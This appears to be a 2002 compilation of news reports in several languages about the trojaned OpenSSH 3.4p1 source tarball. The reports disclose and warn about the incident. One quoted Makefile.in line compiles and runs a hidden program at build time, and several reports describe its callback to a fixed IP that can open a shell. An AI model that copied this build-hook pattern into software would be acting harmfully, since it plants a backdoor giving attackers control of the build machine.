|
"I don't care what you say about me, just spell my name right" -- P.T. Barnum
Do you know any other articles regarding the OpenSSH 3.4p1 trojan
which are not mentioned here? Please let me know!
All articles here are © by their respective authors.
SecuriTeam.com
OpenSSH Trojaned (Version 3.4p1)
Original article
Title |
1/8/2002 |
OpenSSH Trojaned (Version 3.4p1)
|
Summary |
A Trojaned version of OpenSSH package has been found to reside on ftp.openbsd.org's server. The Trojaned version allows remote attackers to completely compromise the security of the server running the Trojaned copy.
|
Details |
The following OpenSSH package found on ftp.openbsd.org (and probably all its mirrors now) has been found to beTrojaned:
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
The OpenBSD people have been informed about it (via email to [email protected] and via irc.openprojects.org/#openbsd)
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
bf-test.c[1] is nothing more than a wrapper that generates a shell-script[2] that compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net).
The following are links to sources of the malicious files:
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
This is the md5 checksum of the Trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
|
Additional information |
The information has been provided by Edwin Groothuis.
|
Heise News-Ticker
Heise News-Ticker: Trojanisches Pferd in OpenSSH (Update)
Original message
Trojanisches Pferd in OpenSSH
(Update)
Laut einer E-Mail an das OpenSSH-Entwicklerteam ist die portable Version
3.4p1 von OpenSSH mit einem Trojanischen Pferd infiziert. Die
OpenBSD-Entwickler gaben gegenüber heise online inzwischen
bekannt, dass auch die Version 3.2.2p1 betroffen ist. Die portablen
Versionen von OpenSSH -- der Open-Source-Version der SSH-Protokollsuite
(Secure Shell), die kryptographisch abgesicherte Kommunikation in
unsicheren Netzen ermöglicht -- werden für Installationen
unter anderen Systemen als OpenBSD eingesetzt. Edwin Groothuis hatte
die infizierte Version auf ftp.freebsd.org gefunden und umgehend
die OpenSSH-Entwickler informiert. Offenbar wurde das Trojanische
Pferd auf einem Server von openbsd.org eingeschleust.
Unmittelbar betroffen sind Anwender, die sich OpenSSH 3.4p1 oder
3.2.2p1 kürzlich manuell besorgt und die Version installiert
haben, ohne die md5-Checksumme zu überprüfen -- also den
Quellcode selbst kompiliert haben. Installationen, die beispielsweise
über das FreeBSD-Port-System eingespielt werden, sollten
abbrechen, eben weil die Checksumme nicht übereinstimmt. Auch
Binärpakete aus anderen Distributionen sind nicht betroffen.
Die infizierte Version enthält ein C-Quellcode namens bf-test.c,
der bei Einrichtung ein Shell-Script installiert, das dann versucht,
eine Verbindung zur IP-Adresse 203.62.158.32 aufzubauen -- der
Server wurde allerdings inzwischen neu aufgesetzt, so dass keine
Verbindungen mehr möglich sind. (pab/c't)
|
Tweakers.net
Trojan wordt verspreid via OpenBSD.org
Original message
Trojan wordt
verspreid via OpenBSD.org
[ti]
schrijft: "Edwin
Groothuis meldt op de FreeBSD security mailinglist dat het
distributiebestand van het het populaire tooltje
OpenSSH op de OpenBSD.org server een Trojaans Paard is. De aanpassing
bevindt zich in het Configure script. Daarin wordt een shell-script
gegenereerd dat probeert een verbinding met een server in Australi
op te zetten. Groothuis uit het sterke vermoeden dat het besmette
bestand al door een groot aantal mirrorsites is overgenomen. Iedereen
die dit bestand recentelijk gedownload heeft doet er dus goed aan
om te controleren of zijn versie in orde is. Hoe iemand de kwaadaardige
programmacode in de OpenSSH distributie heeft weten te krijgen is
niet duidelijk. De beheerders zijn inmiddels op de hoogte gesteld
van de besmetting."
|
Security.nl
OpenSSH distributie gekraakt
Original story
OpenSSH distributie gekraakt |
|
Door: Redactie Security.nl op do 01 aug 2002 11:05 Edwin Groothuis meldt op de FreeBSD security mailinglist dat het distributiebestand van OpenSSH op de OpenSSH distributie-server een Trojaans Paard is. Hij uit het vermoeden dat dit op de mirrors ook weleens het geval kan zijn. Iedereen die recentelijk dit bestand gedownload en geinstalleerd doet er goed aan te controleren of deze in orde is.
Hoe iemand er in geslaagd is de kwaadaardige programmacode in de OpenSSH distributie heeft weten te krijgen is niet duidelijk. De aanpassing bevindt zicht in het Configure script. Daarin wordt een shell-script gegenereerd dat probeert verbinding met een server in Australie op te zetten. Het domein van deze server, snsonline.net is in handen van een zeker Mark Sergeant. Op www.snsonline.net bevindt zich de website van en hostingbedrijf. Het is niet duidelijk of SNS Online in de zaak betrokken is of dat het hier een gekraakte server betreft. |
|
The Register
OpenSSH trojaned!
Original message
OpenSSH trojaned!
Posted: 01/08/2002 at 15:31 GMT
Copies of OpenSSH packages on popular download
sites have been trojaned, developers have warned.
Overnight it was realised that the tarball for OpenSSH 3.4p1 on the
main openBSD (ftp.openbsd.org) mirror was compromised, after
developers noticed that the checksum of the package had changed.
Other mirror sites might also be affected.
The malicious code is not particularly sophisticated but it
is a remotely controllable program that could give potential
attackers root access to victim's machines. The backdoor is in the
makefile that comes with the package, not the OpenSSH software
itself.
Initial analysis suggests that code has been added to the package
which generates a shell script which, when compiled, tries to contact
203.62.158.32 (web.snsonline.net) on port 6667. It seems that the
trojan is executed during build only.
Who compromised the openSSH package and their motives remain unclear.
OpenBSD developers have been informed on the issue, and a
clean-up operation can be expected to commence shortly. For now,
however, users would do well to exercise extreme caution in updating
their machines.
OpenSSH is a free version of the SSH (Secure Shell) communications
suite and is used as a secure replacement for protocols such as
Telnet, Rlogin, Rsh, and Ftp. ®
External Links
Copy of Weblog by Australian developer Edwin Groothuis analysing the problem
Other developers sound the alarm bells
|
Da Linux French Page
Sécurité: Cheval de troie dans OpenSSH
Original message
Post par falbala. Approuv le Jeudi 01 Aot 12:42
[M]
|
D'après un mail sur la liste de
freebsd-security, le tarball de la dernier version d'openssh portable
(openssh-3.4-p1) contient un shell code dans openbsd-compat/bf-test.c,
qui sera lancé via Makefile.in si on fait un make.
Vous pouvez comparez avec un miroir :
ftp.openbsd.org (infecté) :
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
ftp.lip6.org (non infecté):
ftp://ftp.lip6.fr/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
|
|
|
|
Slashdot: News for nerds, stuff that matters
OpenSSH Package Trojaned
Original message
[ Security
]Posted by michael
on Thursday August 01, @11:10PM from the
md5-saves-lives dept. cperciva writes "The original
story is here.
And more details are available from the guy's weblog here."
Here's a mirror
of that email message. Another reader writes, "Not really a
trojan because all it does is make a connection to 203.62.158.32:6667."
Still another writes "The tarball of the portable OpenSSH on
ftp.openbsd.org is trojaned. The backdoor is only used during build
- generated binaries are fine." There isn't much authoritative
information available, but this appears legitimate - please be
careful if you're updating any of your machines with code from
ftp.openbsd.org, and we'll update this story with more links as
information is available. Update: 08/01 19:13 GMT by M: OpenSSH now has an
advisory.
|
vnunet.com
Puzzling Trojan affects OpenSSH
Original message
Puzzling Trojan affects OpenSSH
By James Middleton [01-08-2002]
Geeks
in a quandary over mystery infection
Geeks have been sent scampering to solve the case of how the latest
Open secure shell (SSH) package came to be Trojaned. The infected
file was discovered on the OpenBSD website, but all mirrors should
also be considered compromised. This afternoon, alerts started
popping up on security websites that a Trojan horse was hidden in
the most recent portable version of OpenSSH, v3.4p1. The strange
thing is that the backdoor appears only to be active while the files
are being built; the resultant generated binaries are clean. If
the infected files are downloaded and compiled, during the build
process the Trojan will attempt to connect to IP 203.62.158.32 port
6667, which belongs to a Melbourne-based hosting company, SNS Online.
There is some speculation that the SNS box may have been hacked
and owned by someone who is using it to try and take over a host
of *nix boxes, because when the Trojan becomes active it is listening
for one of three commands from the Aussie server. In one case
the Trojan may go to sleep for an hour, which immediately pours
water on the theory that it is only active during build. In another
it will abort completely. The third option will spawn a command
shell with whatever privileges the user at the time was running
with. Many people compile software logged in as root, which means
that the hacker could potentially have gained root control over a
number of boxes. The backdoor came to light when one user
discovered that the MD5 checksums, designed to verify the authenticity
of the code, did not match. Some users report that early downloads
of the file do not seem to have been exploited, however, and the
Trojaned file has only appeared in the last day or so. Another
puzzle that has cropped up is that if whoever modified the file had
access to the source code and the server, why did they not modify
the MD5 checksum as well? The group that runs Open BSD has been
informed, but it is not yet clear what action is being taken.
|
F&L Publications Home Page
Trojan in OpenSSH 3.4
Original article
De Nederlander Edwin Groothuis heeft in de laatste versie van OpenSSH een Trojan ontdekt. Het gaat om alle versies van OpenSSH versie 3.4 -- dus niet alleen de portable branch, zoals eerder werd aangenomen.
Op z'n weblog beschrijft Groothuis hoe hij het veiligheidsgat ontdekte. De Trojan probeert een keer per uur om een verbinding te maken met poort 6667 op een server die loopt op IP-adres 203.62.158.32:6667 (web.snsonline.net). Hij wacht dan op instructies van de persoon die achter die server zit. Als hij een M krijgt gaat hij weer een uurtje slapen, bij een A stopt het proces. Bij een D daarentegen wordt een shell geopend als /bin/sh, waardoor de aanvaller volledige controle over het systeem krijgt (er vanuit gaande dat de OpenSSH-server met root-rechten loopt, wat in de meeste gevallen nog het geval is).
Alles bij elkaar heeft het zes uur geduurd, voordat aan de hand van MD5-checksum werd ontdekt dat de Trojan aanwezig was. Alleen de tarball van OpenSSH bleek geïnfecteerd.
c't/psm
|
Daily Daemon News
OpenSSH tarball trojaned
Original message
OpenSSH tarball trojaned
|
|
|
Slashdot
|
01 August 2002
|
|
Submitted By :
Linh Pham
Edwin Groothuis sent a posted
a message on freebsd-security stating that the OpenSSH 3.4p1
tarball has been trojaned. One of the .c files, bf-test.c, generates
a script that makes a connection attempt to 203.62.158.32:6667.
More information can be found, including the md5 checksum, within
the freebsd-security posting and the SecurityFocus bulletin
here.
( Link )
|
|
|
Unix.se - "A Real Operating System for Real Users"
Trojan i OpenSSH
Original article
|
Trojan i OpenSSH
|
|
Johan Fredin | 01.08.2002 14:56 | S�kerhet
Tidigare idag uppt�cktes att tarbollarna f�r OpenSSH-3.2.2p1, -3.4p1 och -3.4 som finns p� de officiella speglarna inneh�ller en trojan. Den verkar ha lagts dit n�gon g�ng under g�rdagen.
Trojanen ifr�ga aktiveras n�r anv�ndaren k�r configure-scriptet, och ber�r allts� bara de som kompilerar OpenSSH sj�lva. F�rdigkompilerade bin�rer inneh�ller allts� inte denna trojan. Det trojanen g�r �r att �ppna en TCP-session mot IP:t 203.62.158.32 p� port 6667, och inv�ntar d�refter ett kommando:
- 'M' f�r att f� processen att koppla upp sig igen en timme senare
- 'A' f�r att d�da den.
- 'D' k�r /bin/sh som anv�ndaren som k�rde configure-scriptet.
Eftersom m�nga (tyv�rr) kompilerar saker som root betyder det att trojanen kan f� upp ett root-skal. �garen av IPt som trojanen kontaktar vet om detta, och l�mpliga �tg�rder har tagit.
Den burken �r nu restriktivt brandv�ggad, allts� kan inga nya anslutningar g�ras mot port 6667. Trojanen �r d�rf�r mer eller mindre ofarlig i nul�get. Det som �r mer skr�mmande �r att n�n lyckades f� in flera OpenSSH-tarbollar p� ftp.openbsd.org som inneh�ll en trojan.
Om de lyckades med detta, vad mer kan de �dstakomma?
L�nkar:
Han som f�rst verkar ha hittat trojanen h�r
Mer info, md5summor h�r
Uppdatering: Webbloggen ovan �r inte tillg�nglig p� sin ursprungliga adress. En kopia av den finns h�r.
Uppdatering nr2: Officiellt uttalande med md5summor �terfinns h�r.
|
BSDFreaks.nl
OpenSSH van ftp.openbsd.org bevatte een trojan
Original article
OpenSSH van ftp.openbsd.org bevatte een trojan
Posted by Inferno on 02 Aug 2002 01:15:32
Edwin Groothuis is er achter gekomen dat op de ftp site van openbsd.org
een vervuilde OpenSSH aanwezig was. Deze vervuilde OpenSSH zorge
voor een aanpassing het configure script zodat er een shell script
gegenereerd wordt dat probeert verbinding te leggen met een
Australische server en zo mogelijk een DDOS aanval kan uitvoeren. Het
besmette bestand is inmiddels verwijderd.
|
Debian Planet - News for Debian. Stuff that "really" matters..nl
OpenSSH packages not vulnerable
Original article
OpenSSH packages not vulnerable Submitted by robster on Thursday, August 01, 2002 - 16:22 | The OpenSSH 3.4p1
packages on the OpenBSD FTP
server were trojaned earlier today, as discovered
by a FreeBSD user, Edwin Groothuis. The trojan only works at build
time, and binaries produced from the source are not vulnerable, as
detailed on his weblog
(copied to /. because of bandwidth limitations).
The
Debian packages were created some time ago from original untrojaned
tarballs and are thus not affected in this way (and nor is the
package maintainer's machine). The source tarball and the binary
packages in the Debian archive are not affected, as confirmed by
the ssh package maintainer, and several other Debian
developers. | |
|
SecurityFocus Online
Time for Open-Source to Grow Up
Original article
This is not a news-report on itself, more a discussion-item regarding
how to check software integrity and using the incident with the
OpenSSH trojan as an example.
|
|
|